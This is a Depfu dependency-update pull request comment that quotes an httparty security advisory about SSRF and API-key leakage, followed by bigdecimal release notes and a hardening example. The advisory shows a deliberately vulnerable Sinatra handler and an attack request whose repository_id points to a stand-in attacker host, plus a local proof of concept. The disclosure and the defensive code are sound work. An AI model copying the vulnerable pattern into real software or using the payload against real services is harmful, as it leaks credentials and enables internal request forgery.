@depfu depfu bot commented Dec 29, 2025


🚨 Your current dependencies have known security vulnerabilities 🚨

This dependency update fixes known security vulnerabilities. Please see the details below and assess their impact carefully. We recommend merging and deploying this as soon as possible!


Here is everything you need to know about this update. Please take a good look at what changed and the test results before merging this pull request.

What changed?

✳️ httparty (0.23.2 → 0.24.0) · Repo · Changelog

Security Advisories 🚨

🚨 httparty Has Potential SSRF Vulnerability That Leads to API Key Leakage

Summary

There may be an SSRF vulnerability in httparty. This issue can pose a risk of leaking API keys, and it can also allow third parties to issue requests to internal servers.

Details

When httparty receives a path argument that is an absolute URL, it ignores the base_uri field. As a result, if a malicious user can control the path value, the application may unintentionally communicate with a host that the programmer did not anticipate.

Consider the following example of a web application:

require 'sinatra'
require 'sinatra/json'   # provides the json helper used in the handler
require 'json'
require 'httparty'

class RepositoryClient
  include HTTParty
  base_uri 'http://example.test/api/v1/repositories/'
  headers 'X-API-KEY' => '1234567890'
end

post '/issue' do
  request_body = JSON.parse(request.body.read)
  # Vulnerable: an absolute URL in repository_id makes httparty ignore base_uri
  RepositoryClient.get(request_body['repository_id']).body
  # do something
  json message: 'OK'
end

Now, suppose an attacker sends a request like this:

POST /issue HTTP/1.1
Host: localhost:10000
Content-Type: application/json

{
"repository_id": "http://attacker.test",
"title": "test"
}

In this case, httparty sends the X-API-KEY not to http://example.test but instead to http://attacker.test.

A similar problem was reported and fixed in the HTTP client library axios in the past:
axios/axios#6463

Also, Python's urljoin function has documented a warning about similar behavior:
https://docs.python.org/3.13/library/urllib.parse.html#urllib.parse.urljoin

PoC

Follow these steps to reproduce the issue:

  1. Set up two simple HTTP servers.

    mkdir /tmp/server1 /tmp/server2
    echo "this is server1" > /tmp/server1/index.html
    echo "this is server2" > /tmp/server2/index.html
    python -m http.server -d /tmp/server1 10001 &
    python -m http.server -d /tmp/server2 10002 &

  2. Create a script (for example, main.rb):

    require 'httparty'

    class Client
      include HTTParty
      base_uri 'http://localhost:10001'
    end

    data = Client.get('http://localhost:10002').body
    puts data

  3. Run the script:

    $ ruby main.rb
    this is server2

Although base_uri is set to http://localhost:10001/, httparty sends the request to http://localhost:10002/.

Impact

  • Leakage of credentials: If an absolute URL is provided, any API keys or credentials configured in httparty may be exposed to unintended third-party hosts.
  • SSRF (Server-Side Request Forgery): Attackers can force the httparty-based program to send requests to other internal hosts within the network where the program is running.
  • Affected users: Any software that uses base_uri and does not properly validate the path parameter may be affected by this issue.
Commits

See the full diff on Github. The new version differs by 9 commits:

↗️ bigdecimal (indirect, 3.3.1 → 4.0.1) · Repo · Changelog

Release Notes

4.0.1

What's Changed

  • Exclude dependabot updates from release note by @hsbt in #474
  • Remove unused variable (and add test for it) by @tompng in #475
  • Remove "Which version should you select" section by @tompng in #476
  • Bump version to v4.0.1 by @tompng in #477

Full Changelog: v4.0.0...v4.0.1

4.0.0

What's Changed

  • Fix x**y, x.power(y, 0) and x.sqrt(0) calculates huge digits if precision limit is huge by @tompng in #445
  • Implement major math functions by @tompng in #336
  • Fix fast-path of frac and _decimal_shift affected by BigDecimal.limit by @tompng in #447
  • Update the latest versions of actions by @hsbt in #449
  • Add missing bigmath precision test, add missing indent by @tompng in #450
  • Make BigMath.exp and log also a module_method by @tompng in #452
  • Fix incorrect exception when exponent is fractional for Infinity base by @troy-dunamu in #453
  • Bump step-security/harden-runner from 2.13.1 to 2.13.2 by @dependabot[bot] in #454
  • Don't use assert_separatly if not needed by @tompng in #455
  • Bump actions/checkout from 5.0.0 to 6.0.0 by @dependabot[bot] in #456
  • Bump actions/checkout from 5.0.1 to 6.0.0 by @dependabot[bot] in #457
  • Add missing BigMath test for jruby by @tompng in #459
  • Change remainder/modulo/divmod test of +0/-0 type tolerant by @tompng in #460
  • Cast divmod quotient to int by @mrzasa in #312
  • Bump actions/checkout from 6.0.0 to 6.0.1 by @dependabot[bot] in #462
  • Bump step-security/harden-runner from 2.13.2 to 2.13.3 by @dependabot[bot] in #461
  • Implement BigMath.erf(x, prec) and BigMath.erfc(x, prec) by @tompng in #357
  • Implement BigMath.gamma and BigMath.lgamma by @tompng in #451
  • Fix typos + improve copy/paste in readme by @tas50 in #463
  • Fix inaccurate calculation (last digit) and add a workaround for add/sub hang bug by @tompng in #465
  • Fix lgamma precision around 1 and 2 by @tompng in #466
  • Fix lgamma precision when gamma(negative_x).abs nearly equals 1 by @tompng in #467
  • Implement BigMath.frexp and ldexp with exponent of 10 by @tompng in #448
  • Bump step-security/harden-runner from 2.13.3 to 2.14.0 by @dependabot[bot] in #468
  • Better rounding of BigMath.atan(nearly_one, prec) by @tompng in #469
  • Remove deprecated method BigDecimal#precs by @tompng in #470
  • Deprecate ludcmp, jacobian and newton by @tompng in #471
  • Bump version to v4.0.0 by @tompng in #472

New Contributors

Full Changelog: v3.3.1...v4.0.0

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 40 commits:

↗️ multi_xml (indirect, 0.7.2 → 0.8.0) · Repo · Changelog

Release Notes

0.8.0 (from changelog)

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 36 commits:


Depfu Status

Depfu will automatically keep this PR conflict-free, as long as you don't add any commits to this branch yourself. You can also trigger a rebase manually by commenting with @depfu rebase.

All Depfu comment commands
@depfu rebase
Rebases against your default branch and redoes this update
@depfu recreate
Recreates this PR, overwriting any edits that you've made to it
@depfu merge
Merges this PR once your tests are passing and conflicts are resolved
@depfu cancel merge
Cancels automatic merging of this PR
@depfu close
Closes this PR and deletes the branch
@depfu reopen
Restores the branch and reopens this PR (if it's closed)
@depfu pause
Ignores all future updates for this dependency and closes this PR
@depfu pause [minor|major]
Ignores all future minor/major updates for this dependency and closes this PR
@depfu resume
Future versions of this dependency will create PRs again (leaves this PR as is)
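The httparty advisory above (Details and Impact) describes how an absolute URL supplied as the path replaces base_uri. The following is an added example, not code from the advisory or from httparty, showing that resolution behaviour with Ruby's standard URI library (URI.join is assumed here as a stand-in for httparty's own resolution) alongside a hardened builder that only accepts a single-segment identifier and confirms the host never changes; the base URI, the allow-list regex and the helper names are constructed for this example.

```ruby
require 'uri'

# Constructed base URI, matching the advisory's example application.
BASE_URI = 'http://example.test/api/v1/repositories/'

# Mirrors the outcome described in the advisory: when the path is an
# absolute URL it replaces the base entirely (URI.join semantics, assumed
# here as a stand-in for httparty's own resolution).
def resolve_like_httparty(base, path)
  URI.join(base, path).to_s
end

class UnsafeRepositoryId < ArgumentError; end

# Hypothetical allow-list for identifiers: one path segment only, so a
# scheme ("http:"), a scheme-relative prefix ("//") or ".." never appears.
REPOSITORY_ID = /\A[A-Za-z0-9_-]{1,64}\z/

# Hardened URL construction: validate the caller-supplied id, build the
# URL from the trusted base, then confirm the host was not changed.
def repository_url(base, repository_id)
  id = repository_id.to_s
  unless REPOSITORY_ID.match?(id)
    raise UnsafeRepositoryId, "rejected repository_id #{id.inspect}"
  end
  url = URI.join(base, URI.encode_www_form_component(id))
  raise UnsafeRepositoryId, 'host changed' unless url.host == URI(base).host
  url.to_s
end

# Convenience predicate: true when the builder refuses the identifier.
def rejected?(base, repository_id)
  repository_url(base, repository_id)
  false
rescue UnsafeRepositoryId
  true
end

if __FILE__ == $PROGRAM_NAME
  puts resolve_like_httparty(BASE_URI, 'http://attacker.test') # http://attacker.test
  puts repository_url(BASE_URI, 'repo-42')
  puts rejected?(BASE_URI, 'http://attacker.test')
end
```

The same check applies to any httparty client whose path comes from request data: build the URL from your own base and a validated segment, never from a caller-supplied string passed straight to get.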

@depfu depfu bot added the depfu label Dec 29, 2025
@depfu depfu bot assigned mockdeep Dec 29, 2025
@depfu depfu bot requested a review from mockdeep December 29, 2025 18:07
@depfu depfu bot merged commit e2dc6c6 into main Dec 29, 2025
3 checks passed
@depfu depfu bot deleted the depfu/update/httparty-0.24.0 branch December 29, 2025 18:21